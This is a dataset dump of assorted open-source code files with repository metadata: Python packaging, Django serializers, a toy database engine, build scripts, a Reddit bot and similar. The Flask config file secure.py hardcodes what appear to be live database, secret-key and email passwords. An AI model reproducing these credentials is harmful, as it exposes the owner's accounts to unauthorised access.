[ "BSD-3-Clause" ]
2
2021-12-01T17:04:39.000Z
2022-01-20T22:53:40.000Z
from setuptools import find_packages, setup setup( name='src', packages=find_packages(), version='0.1.0', description='This repository hosts some work-in-progress experiments applying deep learning to predict age using tractometry data.', author='Joanna Qiao', license='BSD-3', )
27.727273
136
0.718033
40
305
5.425
0.875
0.110599
0
0
0
0
0
0
0
0
0
0.015873
0.17377
305
10
137
30.5
0.845238
0
0
0
0
0
0.462295
0
0
0
0
0
0
1
0
true
0
0.111111
0
0.111111
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
1
e6960adb05d4b964e50fe6cceef1e01091d1811d
2,327
py
Python
FusionIIIT/applications/placement_cell/api/serializers.py
29rj/Fusion
bc2941a67532e183adeb0bc4042df0b182b9e3aa
[ "bzip2-1.0.6" ]
29
2019-02-20T15:35:33.000Z
2022-03-22T11:10:57.000Z
FusionIIIT/applications/placement_cell/api/serializers.py
29rj/Fusion
bc2941a67532e183adeb0bc4042df0b182b9e3aa
[ "bzip2-1.0.6" ]
409
2019-01-17T19:30:51.000Z
2022-03-31T16:28:45.000Z
FusionIIIT/applications/placement_cell/api/serializers.py
29rj/Fusion
bc2941a67532e183adeb0bc4042df0b182b9e3aa
[ "bzip2-1.0.6" ]
456
2019-01-12T11:01:13.000Z
2022-03-30T17:06:52.000Z
from rest_framework.authtoken.models import Token from rest_framework import serializers from applications.placement_cell.models import (Achievement, Course, Education, Experience, Has, Patent, Project, Publication, Skill, PlacementStatus, NotifyStudent) class SkillSerializer(serializers.ModelSerializer): class Meta: model = Skill fields = ('__all__') class HasSerializer(serializers.ModelSerializer): skill_id = SkillSerializer() class Meta: model = Has fields = ('skill_id','skill_rating') def create(self, validated_data): skill = validated_data.pop('skill_id') skill_id, created = Skill.objects.get_or_create(**skill) try: has_obj = Has.objects.create(skill_id=skill_id,**validated_data) except: raise serializers.ValidationError({'skill': 'This skill is already present'}) return has_obj class EducationSerializer(serializers.ModelSerializer): class Meta: model = Education fields = ('__all__') class CourseSerializer(serializers.ModelSerializer): class Meta: model = Course fields = ('__all__') class ExperienceSerializer(serializers.ModelSerializer): class Meta: model = Experience fields = ('__all__') class ProjectSerializer(serializers.ModelSerializer): class Meta: model = Project fields = ('__all__') class AchievementSerializer(serializers.ModelSerializer): class Meta: model = Achievement fields = ('__all__') class PublicationSerializer(serializers.ModelSerializer): class Meta: model = Publication fields = ('__all__') class PatentSerializer(serializers.ModelSerializer): class Meta: model = Patent fields = ('__all__') class NotifyStudentSerializer(serializers.ModelSerializer): class Meta: model = NotifyStudent fields = ('__all__') class PlacementStatusSerializer(serializers.ModelSerializer): notify_id = NotifyStudentSerializer() class Meta: model = PlacementStatus fields = ('notify_id', 'invitation', 'placed', 'timestamp', 'no_of_days')
27.376471
89
0.644607
200
2,327
7.215
0.34
0.198198
0.106722
0.218295
0.24948
0
0
0
0
0
0
0
0.270735
2,327
84
90
27.702381
0.850324
0
0
0.333333
0
0
0.072626
0
0
0
0
0
0
1
0.016667
false
0
0.05
0
0.483333
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
e6a0c4454894632f570e8f7308cb8d060eed1f45
767
py
Python
modtox/Helpers/helpers.py
danielSoler93/modtox
757234140cc780f57d031b46d9293fc2bf95d18d
[ "Apache-2.0" ]
4
2019-09-22T22:57:30.000Z
2020-03-18T13:20:50.000Z
modtox/Helpers/helpers.py
danielSoler93/ModTox
757234140cc780f57d031b46d9293fc2bf95d18d
[ "Apache-2.0" ]
21
2019-09-16T11:07:13.000Z
2019-11-20T15:06:06.000Z
modtox/Helpers/helpers.py
danielSoler93/ModTox
757234140cc780f57d031b46d9293fc2bf95d18d
[ "Apache-2.0" ]
2
2019-09-07T17:07:55.000Z
2020-03-18T13:20:52.000Z
import os def retrieve_molecule_number(pdb, resname): """ IDENTIFICATION OF MOLECULE NUMBER BASED ON THE TER'S """ count = 0 with open(pdb, 'r') as x: lines = x.readlines() for i in lines: if i.split()[0] == 'TER': count += 1 if i.split()[3] == resname: molecule_number = count + 1 break return molecule_number class cd: """Context manager for changing the current working directory""" def __init__(self, newPath): self.newPath = os.path.expanduser(newPath) def __enter__(self): self.savedPath = os.getcwd() os.chdir(self.newPath) def __exit__(self, etype, value, traceback): os.chdir(self.savedPath)
23.96875
68
0.573664
93
767
4.55914
0.580645
0.132075
0.037736
0
0
0
0
0
0
0
0
0.009542
0.316819
767
31
69
24.741935
0.799618
0.148631
0
0
0
0
0.006319
0
0
0
0
0
0
1
0.210526
false
0
0.052632
0
0.368421
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
e6a5916da8516ca978c7505bb56075d47bacaa77
826
py
Python
tools/webcam/webcam_apis/nodes/__init__.py
ivmtorres/mmpose
662cb50c639653ae2fc19d3421ce10bd02246b85
[ "Apache-2.0" ]
1
2022-02-13T12:27:40.000Z
2022-02-13T12:27:40.000Z
tools/webcam/webcam_apis/nodes/__init__.py
ivmtorres/mmpose
662cb50c639653ae2fc19d3421ce10bd02246b85
[ "Apache-2.0" ]
null
null
null
tools/webcam/webcam_apis/nodes/__init__.py
ivmtorres/mmpose
662cb50c639653ae2fc19d3421ce10bd02246b85
[ "Apache-2.0" ]
null
null
null
# Copyright (c) OpenMMLab. All rights reserved. from .builder import NODES from .faceswap_nodes import FaceSwapNode from .frame_effect_nodes import (BackgroundNode, BugEyeNode, MoustacheNode, NoticeBoardNode, PoseVisualizerNode, SaiyanNode, SunglassesNode) from .helper_nodes import ModelResultBindingNode, MonitorNode, RecorderNode from .mmdet_nodes import DetectorNode from .mmpose_nodes import TopDownPoseEstimatorNode from .xdwendwen_nodes import XDwenDwenNode __all__ = [ 'NODES', 'PoseVisualizerNode', 'DetectorNode', 'TopDownPoseEstimatorNode', 'MonitorNode', 'BugEyeNode', 'SunglassesNode', 'ModelResultBindingNode', 'NoticeBoardNode', 'RecorderNode', 'FaceSwapNode', 'MoustacheNode', 'SaiyanNode', 'BackgroundNode', 'XDwenDwenNode' ]
45.888889
78
0.74092
65
826
9.246154
0.476923
0.109817
0
0
0
0
0
0
0
0
0
0
0.175545
826
17
79
48.588235
0.882526
0.054479
0
0
0
0
0.263158
0.05905
0
0
0
0
0
1
0
false
0
0.466667
0
0.466667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
e6aa6635d278553660a8a5b50b4098367fae31a5
2,446
py
Python
composer/profiler/__init__.py
stanford-crfm/composer
4996fbd818971afd6439961df58b531d9b47a37b
[ "Apache-2.0" ]
null
null
null
composer/profiler/__init__.py
stanford-crfm/composer
4996fbd818971afd6439961df58b531d9b47a37b
[ "Apache-2.0" ]
null
null
null
composer/profiler/__init__.py
stanford-crfm/composer
4996fbd818971afd6439961df58b531d9b47a37b
[ "Apache-2.0" ]
null
null
null
# Copyright 2021 MosaicML. All Rights Reserved. """Performance profiling tools. The profiler gathers performance metrics during a training run that can be used to diagnose bottlenecks and facilitate model development. The metrics gathered include: * Duration of each :class:`.Event` during training * Time taken by the data loader to return a batch * Host metrics such as CPU, system memory, disk and network utilization over time * Execution order, latency and attributes of PyTorch operators and GPU kernels (see :doc:`profiler`) The following example demonstrates how to setup and perform profiling on a simple training run. .. literalinclude:: ../../../examples/profiler_demo.py :language: python :linenos: :emphasize-lines: 6, 27-49 It is required to specify an output ``profiler_trace_file`` during :class:`.Trainer` initialization to enable profiling. The ``profiler_trace_file`` will contain the profiling trace data once the profiling run completes. By default, the :class:`.Profiler`, :class:`.DataloaderProfiler` and :class:`.SystemProfiler` will be active. The :class:`.TorchProfiler` is **disabled** by default. To activate the :class:`.TorchProfiler`, the ``torch_profiler_trace_dir`` must be specified *in addition* to the ``profiler_trace_file`` argument. The ``torch_profiler_trace_dir`` will contain the Torch Profiler traces once the profiling run completes. The :class:`.Profiler` will automatically merge the Torch traces in the ``torch_profiler_trace_dir`` into the ``profiler_trace_file``, allowing users to view a unified trace. The complete traces can be viewed by in a Google Chrome browser navigating to ``chrome://tracing`` and loading the ``profiler_trace_file``. Here is an example trace file: .. image:: https://storage.googleapis.com/docs.mosaicml.com/images/profiler/profiler_trace_example.png :alt: Example Profiler Trace File :align: center Additonal details an be found in the Profiler Guide. """ from composer.profiler._event_handler import ProfilerEventHandler from composer.profiler._profiler import Marker, Profiler from composer.profiler._profiler_action import ProfilerAction # All needs to be defined properly for sphinx autosummary __all__ = [ "Marker", "Profiler", "ProfilerAction", "ProfilerEventHandler", ] Marker.__module__ = __name__ Profiler.__module__ = __name__ ProfilerAction.__module__ = __name__ ProfilerEventHandler.__module__ = __name__
44.472727
146
0.780867
326
2,446
5.665644
0.48773
0.070384
0.055225
0.043313
0.069302
0
0
0
0
0
0
0.004265
0.137367
2,446
54
147
45.296296
0.87109
0.822976
0
0
0
0
0.112941
0
0
0
0
0
0
1
0
false
0
0.230769
0
0.230769
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
e6cd191f4e7eeaa1d075d528c9e2ada0827d674f
4,618
py
Python
HW2/dbsys-hw2/Database.py
yliu120/dbsystem
d1b008f411929058a34a1dd2c44c9ee2cf899865
[ "Apache-2.0" ]
null
null
null
HW2/dbsys-hw2/Database.py
yliu120/dbsystem
d1b008f411929058a34a1dd2c44c9ee2cf899865
[ "Apache-2.0" ]
null
null
null
HW2/dbsys-hw2/Database.py
yliu120/dbsystem
d1b008f411929058a34a1dd2c44c9ee2cf899865
[ "Apache-2.0" ]
null
null
null
import json, io, os, os.path from Catalog.Schema import DBSchema, DBSchemaEncoder, DBSchemaDecoder from Query.Plan import PlanBuilder from Storage.StorageEngine import StorageEngine class Database: """ A top-level database engine class. For now, this primarily maintains a simple catalog, mapping relation names to schema objects. Also, it provides the ability to construct query plan objects, as well as wrapping the storage layer methods. """ checkpointEncoding = "latin1" checkpointFile = "db.catalog" def __init__(self, **kwargs): other = kwargs.get("other", None) if other: self.fromOther(other) else: storageArgs = {k:v for (k,v) in kwargs.items() \ if k in ["pageSize", "poolSize", "dataDir", "indexDir"]} self.relationMap = kwargs.get("relations", {}) self.defaultPageSize = kwargs.get("pageSize", io.DEFAULT_BUFFER_SIZE) self.storage = kwargs.get("storage", StorageEngine(**storageArgs)) checkpointFound = os.path.exists(os.path.join(self.storage.fileMgr.dataDir, Database.checkpointFile)) restoring = "restore" in kwargs if not restoring and checkpointFound: self.restore() def fromOther(self, other): self.relationMap = other.relationMap self.defaultPageSize = other.defaultPageSize self.storage = other.storage def close(self): if self.storage: self.storage.close() # Database internal components def storageEngine(self): return self.storage def bufferPool(self): return self.storage.bufferPool if self.storage else None def fileManager(self): return self.storage.fileMgr if self.storage else None # User API # Catalog methods def relations(self): return self.relationMap.keys() def hasRelation(self, relationName): return relationName in self.relationMap def relationSchema(self, relationName): if relationName in self.relationMap: return self.relationMap[relationName] # DDL statements def createRelation(self, relationName, relationFields): if relationName not in self.relationMap: schema = DBSchema(relationName, relationFields) self.relationMap[relationName] = schema self.storage.createRelation(relationName, schema) self.checkpoint() else: raise ValueError("Relation '" + relationName + "' already exists") def removeRelation(self, relationName): if relationName in self.relationMap: del self.relationMap[relationName] self.storage.removeRelation(relationName) self.checkpoint() else: raise ValueError("No relation '" + relationName + "' found in database") # DML statements # Returns a tuple id for the newly inserted data. def insertTuple(self, relationName, tupleData): if relationName in self.relationMap: return self.storage.insertTuple(relationName, tupleData) else: raise ValueError("Unknown relation '" + relationName + "' while inserting a tuple") def deleteTuple(self, tupleId): self.storage.deleteTuple(tupleId) def updateTuple(self, tupleId, tupleData): self.storage.updateTuple(tupleId, tupleData) # Queries # Returns an empty query builder that can access the current database. def query(self): return PlanBuilder(db=self) # Returns an iterable for query results, after initializing the given plan. def processQuery(self, queryPlan): return queryPlan.prepare(self) # Save the database internals to the data directory. def checkpoint(self): if self.storage: dbcPath = os.path.join(self.storage.fileMgr.dataDir, Database.checkpointFile) with open(dbcPath, 'w', encoding=Database.checkpointEncoding) as f: f.write(self.pack()) # Load relations and schema from an existing data directory. def restore(self): if self.storage: dbcPath = os.path.join(self.storage.fileMgr.dataDir, Database.checkpointFile) with open(dbcPath, 'r', encoding=Database.checkpointEncoding) as f: other = Database.unpack(f.read(), self.storage) self.fromOther(other) # Database schema catalog serialization def pack(self): if self.relationMap is not None: return json.dumps([self.relationMap, self.defaultPageSize], cls=DBSchemaEncoder) @classmethod def unpack(cls, buffer, storageEngine): (relationMap, pageSize) = json.loads(buffer, cls=DBSchemaDecoder) return cls(relations=relationMap, pageSize=pageSize, storage=storageEngine, restore=True) if __name__ == "__main__": import doctest doctest.testmod()
31.848276
107
0.707016
524
4,618
6.204198
0.311069
0.067671
0.019994
0.035681
0.177176
0.121193
0.121193
0.076592
0.076592
0.059059
0
0.000271
0.19987
4,618
144
108
32.069444
0.879567
0.145518
0
0.177778
0
0
0.049578
0
0
0
0
0
0
1
0.222222
false
0
0.055556
0.077778
0.433333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
e6ce056f0a84e4b655921e3c42a24774c81e07e4
619
py
Python
moderngl_window/resources/data.py
DavideRuzza/moderngl-window
e9debc6ed4a1899aa83c0da2320e03b0c2922b80
[ "MIT" ]
142
2019-11-11T23:14:28.000Z
2022-03-29T08:37:03.000Z
moderngl_window/resources/data.py
DavideRuzza/moderngl-window
e9debc6ed4a1899aa83c0da2320e03b0c2922b80
[ "MIT" ]
107
2019-10-31T20:31:45.000Z
2022-03-23T15:01:41.000Z
moderngl_window/resources/data.py
DavideRuzza/moderngl-window
e9debc6ed4a1899aa83c0da2320e03b0c2922b80
[ "MIT" ]
36
2019-12-12T16:14:10.000Z
2022-01-18T22:58:21.000Z
""" Registry general data files """ from typing import Any from moderngl_window.resources.base import BaseRegistry from moderngl_window.meta import DataDescription class DataFiles(BaseRegistry): """Registry for requested data files""" settings_attr = "DATA_LOADERS" def load(self, meta: DataDescription) -> Any: """Load data file with the configured loaders. Args: meta (:py:class:`~moderngl_window.meta.data.DataDescription`): the resource description Returns: Any: The loaded resource """ return super().load(meta) data = DataFiles()
23.807692
99
0.678514
69
619
6.014493
0.536232
0.101205
0.086747
0
0
0
0
0
0
0
0
0
0.227787
619
25
100
24.76
0.868201
0.390953
0
0
0
0
0.037736
0
0
0
0
0
0
1
0.125
false
0
0.375
0
0.875
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
e6d6837b46baf712793275d6754e0dab0bf209be
602
py
Python
baseline/ns-vqa/reason/options/test_options.py
robinzixuan/Video-Question-Answering-HRI
ae68ffee1e6fc1eb13229e457e3b8e3bc3a11579
[ "MIT" ]
52
2019-12-04T22:26:56.000Z
2022-03-31T17:04:15.000Z
reason/options/test_options.py
guxiwuruo/VCML
5a0f01a0baba238cef2f63131fccd412e3d7822b
[ "MIT" ]
6
2020-08-25T07:35:14.000Z
2021-09-09T04:57:09.000Z
reason/options/test_options.py
guxiwuruo/VCML
5a0f01a0baba238cef2f63131fccd412e3d7822b
[ "MIT" ]
5
2020-02-10T07:39:24.000Z
2021-06-23T02:53:42.000Z
from .base_options import BaseOptions class TestOptions(BaseOptions): """Test Option Class""" def __init__(self): super(TestOptions, self).__init__() self.parser.add_argument('--load_checkpoint_path', required=True, type=str, help='checkpoint path') self.parser.add_argument('--save_result_path', required=True, type=str, help='save result path') self.parser.add_argument('--max_val_samples', default=None, type=int, help='max val data') self.parser.add_argument('--batch_size', default=256, type=int, help='batch_size') self.is_train = False
43
107
0.699336
79
602
5.050633
0.493671
0.100251
0.130326
0.210526
0.260652
0.135338
0
0
0
0
0
0.005929
0.159468
602
14
108
43
0.782609
0.028239
0
0
0
0
0.210345
0.037931
0
0
0
0
0
1
0.111111
false
0
0.111111
0
0.333333
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
e6ddfeb2d231878165ecef38a814ab51e23d6978
412
py
Python
enan/__init__.py
mizuno-group/enan
3c9dbe60bebf98e384e858db56980928b5897775
[ "MIT" ]
null
null
null
enan/__init__.py
mizuno-group/enan
3c9dbe60bebf98e384e858db56980928b5897775
[ "MIT" ]
null
null
null
enan/__init__.py
mizuno-group/enan
3c9dbe60bebf98e384e858db56980928b5897775
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """ Created on Wed Dec 25 15:46:32 2019 @author: tadahaya """ from .binom import BT from .connect import Connect from .fet import FET from .gsea import GSEA from .ssgsea import ssGSEA __copyright__ = 'Copyright (C) 2020 MIZUNO Tadahaya' __version__ = '1.0.3' __license__ = 'MIT' __author__ = 'MIZUNO Tadahaya' __author_email__ = '[email protected]'
22.888889
56
0.662621
54
412
4.666667
0.648148
0.111111
0
0
0
0
0
0
0
0
0
0.062893
0.228155
412
18
57
22.888889
0.72956
0.186893
0
0
0
0
0.241158
0
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
e6e370a3613328a0a9c46c0e262a69e05fcae601
355
py
Python
pytorch_translate/models/__init__.py
Ayansam1152/translate
33d397fc25fb1072abd2975c77c602a2d031c6c4
[ "BSD-3-Clause" ]
748
2018-05-02T17:12:53.000Z
2022-03-26T04:44:44.000Z
pytorch_translate/models/__init__.py
Ayansam1152/translate
33d397fc25fb1072abd2975c77c602a2d031c6c4
[ "BSD-3-Clause" ]
352
2018-05-02T19:05:59.000Z
2022-02-25T16:54:27.000Z
pytorch_translate/models/__init__.py
Ayansam1152/translate
33d397fc25fb1072abd2975c77c602a2d031c6c4
[ "BSD-3-Clause" ]
193
2018-05-02T17:14:56.000Z
2022-02-24T21:10:56.000Z
#!/usr/bin/env python3 import importlib import os # automatically import any Python files in the models/ directory for file in sorted(os.listdir(os.path.dirname(__file__))): if file.endswith(".py") and not file.startswith("_"): model_name = file[: file.find(".py")] importlib.import_module("pytorch_translate.models." + model_name)
29.583333
73
0.712676
49
355
4.979592
0.673469
0.122951
0
0
0
0
0
0
0
0
0
0.003333
0.15493
355
11
74
32.272727
0.81
0.23662
0
0
0
0
0.118959
0.092937
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
e6e3cdee410d18c73bf42cae95012d7ea773e4ae
808
py
Python
app/config/secure.py
mapeimapei/awesome-flask-webapp
d0474f447a41e9432a14f9110989166c6595f0fa
[ "MIT" ]
2
2020-05-08T15:58:44.000Z
2020-05-09T19:36:34.000Z
app/config/secure.py
mapeimapei/awesome-flask-webapp
d0474f447a41e9432a14f9110989166c6595f0fa
[ "MIT" ]
null
null
null
app/config/secure.py
mapeimapei/awesome-flask-webapp
d0474f447a41e9432a14f9110989166c6595f0fa
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- __author__ = '带土' SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:[email protected]:3306/awesome' SECRET_KEY = '\x88D\xf09\x91\x07\x98\x89\x87\x96\xa0A\xc68\xf9\xecJ:U\x17\xc5V\xbe\x8b\xef\xd7\xd8\xd3\xe6\x98*4' # Email 配置 MAIL_SERVER = 'smtp.exmail.qq.com' MAIL_PORT = 465 MAIL_USE_SSL = True MAIL_USE_TSL = False MAIL_USERNAME = '[email protected]' MAIL_PASSWORD = 'Bmwzy1314520' MAIL_SUBJECT_PREFIX = '[鱼书]' MAIL_SENDER = '鱼书 <[email protected]>' # 开启数据库查询性能测试 SQLALCHEMY_RECORD_QUERIES = True # 性能测试的阀值 DATABASE_QUERY_TIMEOUT = 0.5 SQLALCHEMY_TRACK_MODIFICATIONS = True WTF_CSRF_CHECK_DEFAULT = False SQLALCHEMY_ECHO = True from datetime import timedelta REMEMBER_COOKIE_DURATION = timedelta(days=30) PROXY_API = 'http://ip.yushu.im/get' # PERMANENT_SESSION_LIFETIME = 3600
22.444444
113
0.762376
125
808
4.664
0.792
0.036021
0.041166
0
0
0
0
0
0
0
0
0.087258
0.106436
808
35
114
23.085714
0.720222
0.10396
0
0
0
0.052632
0.335655
0.208914
0
0
0
0
0
1
0
false
0.052632
0.052632
0
0.052632
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
e6e54d8b26245cebf1276442b433cc49edf1fc78
762
py
Python
caller_v3/app/api/v1/docker.py
tienthegainz/pipeline_executor_docker_call
b2b9478056e4b818f5963b0b266375fe6d39627a
[ "MIT" ]
null
null
null
caller_v3/app/api/v1/docker.py
tienthegainz/pipeline_executor_docker_call
b2b9478056e4b818f5963b0b266375fe6d39627a
[ "MIT" ]
null
null
null
caller_v3/app/api/v1/docker.py
tienthegainz/pipeline_executor_docker_call
b2b9478056e4b818f5963b0b266375fe6d39627a
[ "MIT" ]
null
null
null
from typing import Any, List, Callable from fastapi import APIRouter, HTTPException, status, BackgroundTasks from app import schemas from app.core import docker_client import json from copy import deepcopy router = APIRouter() @router.get("/images", response_model=schemas.DockerImageRespond) def get_docker_image() -> Any: images_list = docker_client.images.list(all=True) return { 'images': [{'id': image.short_id, 'tags': image.tags} for image in images_list if image.tags] } @router.get("/volumes", response_model=schemas.DockerVolumeRespond) def get_docker_volume() -> Any: volumes_list = docker_client.volumes.list() return { 'volumes': [{'id': volume.short_id, 'name': volume.name} for volume in volumes_list] }
28.222222
99
0.732283
100
762
5.43
0.4
0.066298
0.073665
0
0
0
0
0
0
0
0
0
0.153543
762
26
100
29.307692
0.84186
0
0
0.105263
0
0
0.052493
0
0
0
0
0
0
1
0.105263
false
0
0.315789
0
0.526316
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
e6eadd6e5aefadc0d052f84f6f0acadbd4bc7e84
440
py
Python
lec2.py
widnerlr/isat252
4196a8b1c6f4c75c3f5d8f64164014103b695077
[ "MIT" ]
null
null
null
lec2.py
widnerlr/isat252
4196a8b1c6f4c75c3f5d8f64164014103b695077
[ "MIT" ]
null
null
null
lec2.py
widnerlr/isat252
4196a8b1c6f4c75c3f5d8f64164014103b695077
[ "MIT" ]
null
null
null
""" Your module description """ """ this is my second py code for my second lecture """ #print ('hello world') # this is a single line commment # this is my second line comment #print(type("123.")) #print ("Hello World".upper()) #print("Hello World".lower()) #print("hello" + "world" + ".") #print(2**3) #my_str = "hello world" #print(my_str) #my_str = "Tom" #print(my_str) my_int = 2 my_float = 3.0 print(my_int + my_float)
12.941176
56
0.638636
70
440
3.9
0.428571
0.18315
0.21978
0.102564
0
0
0
0
0
0
0
0.022161
0.179545
440
34
57
12.941176
0.734072
0.656818
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
0
0.333333
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
e6ee7c4e821041f353c4df40b51b9e9fed815d11
325
py
Python
Part1/bot_read.py
Mildlyoffbeat/RedditBot-1
f65c3c4d0f3d6d3a468069d4a009b44a20e33797
[ "MIT" ]
null
null
null
Part1/bot_read.py
Mildlyoffbeat/RedditBot-1
f65c3c4d0f3d6d3a468069d4a009b44a20e33797
[ "MIT" ]
null
null
null
Part1/bot_read.py
Mildlyoffbeat/RedditBot-1
f65c3c4d0f3d6d3a468069d4a009b44a20e33797
[ "MIT" ]
null
null
null
#!/usr/bin/python import praw reddit = praw.Reddit('mob-secondbot') subreddit = reddit.subreddit("learnpython") for submission in subreddit.hot(limit=5): print("Title: ", submission.title) print("Text: ", submission.selftext) print("Score: ", submission.score) print("---------------------------------\n")
25
48
0.618462
35
325
5.742857
0.628571
0.099502
0
0
0
0
0
0
0
0
0
0.003534
0.129231
325
12
49
27.083333
0.706714
0.049231
0
0
0
0
0.256494
0.113636
0
0
0
0
0
1
0
false
0
0.125
0
0.125
0.5
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
1
e6ee864c778e3c7bd05d01ccaa072084d9d7a6f7
1,052
py
Python
17/kazuate_liar.cpp.py
Siketyan/Programming-I
0749c1ae045d53cd8a67f0de7ab13c26030ddd74
[ "Apache-2.0" ]
null
null
null
17/kazuate_liar.cpp.py
Siketyan/Programming-I
0749c1ae045d53cd8a67f0de7ab13c26030ddd74
[ "Apache-2.0" ]
null
null
null
17/kazuate_liar.cpp.py
Siketyan/Programming-I
0749c1ae045d53cd8a67f0de7ab13c26030ddd74
[ "Apache-2.0" ]
null
null
null
from subprocess import Popen, PIPE, call name = "kazuate_liar.o" src = """ #include <iostream> #include <random> using namespace std; int main() { random_device rd; mt19937 mt(rd()); uniform_int_distribution<int> randfive(0, 4); uniform_int_distribution<int> randint(1, 100); int count = 0; int num = randint(mt); while (1) { int i; cout << "数を当ててみて "; cin >> i; if (i < 1 || i > 100) { cout << "不正な入力です。" << endl; continue; } count++; bool liar = randfive(mt) == 0; if (i == num) { cout << "正解です。おめでとう。 (" << count << " 回目)" << endl; break; } else if ((liar && i > num) || i < num) { cout << "もっと大きいよ。" << endl; } else { cout << "もっと小さいよ。" << endl; } } return 0; } """; proc = Popen(["g++", "-o", name, "-x", "c++", "-"], stdin = PIPE); proc.communicate(src.encode()); call(["./" + name]);
17.533333
66
0.439163
111
1,052
4.108108
0.522523
0.026316
0.096491
0.109649
0
0
0
0
0
0
0
0.029141
0.380228
1,052
59
67
17.830508
0.670245
0
0
0
0
0
0.834443
0.055186
0
0
0
0
0
1
0
false
0
0.021739
0
0.043478
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
e6fab2043b0b6fa907bee5da86873ddbf2cfe3cf
1,432
py
Python
platform/server/detect.py
leyyin/godot
68325d7254db711beaedddad218e2cddb405c42c
[ "CC-BY-3.0", "MIT" ]
24
2016-10-14T16:54:01.000Z
2022-01-15T06:39:17.000Z
platform/server/detect.py
leyyin/godot
68325d7254db711beaedddad218e2cddb405c42c
[ "CC-BY-3.0", "MIT" ]
17
2016-12-30T14:35:53.000Z
2017-03-07T21:07:50.000Z
platform/server/detect.py
leyyin/godot
68325d7254db711beaedddad218e2cddb405c42c
[ "CC-BY-3.0", "MIT" ]
9
2017-08-04T12:00:16.000Z
2021-12-10T06:48:28.000Z
import os import sys def is_active(): return True def get_name(): return "Server" def can_build(): if (os.name!="posix"): return False return True # enabled def get_opts(): return [ ('use_llvm','Use llvm compiler','no'), ('force_32_bits','Force 32 bits binary','no') ] def get_flags(): return [ ('builtin_zlib', 'no'), ] def configure(env): env.Append(CPPPATH=['#platform/server']) if (env["use_llvm"]=="yes"): env["CC"]="clang" env["CXX"]="clang++" env["LD"]="clang++" if (env["colored"]=="yes"): if sys.stdout.isatty(): env.Append(CXXFLAGS=["-fcolor-diagnostics"]) is64=sys.maxsize > 2**32 if (env["bits"]=="default"): if (is64): env["bits"]="64" else: env["bits"]="32" #if (env["tools"]=="no"): # #no tools suffix # env['OBJSUFFIX'] = ".nt"+env['OBJSUFFIX'] # env['LIBSUFFIX'] = ".nt"+env['LIBSUFFIX'] if (env["target"]=="release"): env.Append(CCFLAGS=['-O2','-ffast-math','-fomit-frame-pointer']) elif (env["target"]=="release_debug"): env.Append(CCFLAGS=['-O2','-ffast-math','-DDEBUG_ENABLED']) elif (env["target"]=="debug"): env.Append(CCFLAGS=['-g2', '-Wall','-DDEBUG_ENABLED','-DDEBUG_MEMORY_ENABLED']) env.Append(CPPFLAGS=['-DSERVER_ENABLED','-DUNIX_ENABLED']) env.Append(LIBS=['pthread','z']) #TODO detect linux/BSD! if (env["CXX"]=="clang++"): env.Append(CPPFLAGS=['-DTYPED_METHOD_BIND']) env["CC"]="clang" env["LD"]="clang++"
17.679012
81
0.609637
193
1,432
4.42487
0.435233
0.084309
0.056206
0.030445
0.063232
0.063232
0
0
0
0
0
0.014516
0.134078
1,432
80
82
17.9
0.674194
0.106844
0
0.173913
0
0
0.335697
0.017336
0
0
0
0.0125
0
1
0.130435
false
0
0.043478
0.086957
0.304348
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
e6fc32c8a31669a37234337e3418a714af3c26bd
1,483
py
Python
IntroToSpark/Assign4_Q1-6_action.py
petersontylerd/spark-courses
e8dcb4968ea31a50206739e6af3006889f8c3c6c
[ "MIT" ]
null
null
null
IntroToSpark/Assign4_Q1-6_action.py
petersontylerd/spark-courses
e8dcb4968ea31a50206739e6af3006889f8c3c6c
